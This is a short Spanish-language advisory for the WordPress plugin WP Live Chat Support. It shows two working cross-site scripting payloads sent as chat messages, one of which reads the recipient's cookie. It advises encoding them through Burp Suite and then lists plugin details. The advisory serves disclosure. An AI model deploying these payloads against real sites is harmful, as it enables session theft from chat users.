Vulnerabilidad Plugin: WP Live Chat Support

Enviar cualquiera de los siguientes mensajes a través de chat ejecuta JavaScript no deseado en la ventana de chat de los receptores:

<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 />

x”</title><img src%3dx onerror%3dalert(1)>

Si tiene problemas para reproducir, puede intentar enviarlos a través de Burp Suite, que debería hacer el truco ya que la carga útil necesita ser codificada.

Ficha del Plugin

Versión Actual: 8.1.7
Requisitos: 4.6
Probado en WordPress: 5.3.3
Total Descargas: 1,871,261
Última actualización: 2020-02-05 2:39pm GMT

Ir arriba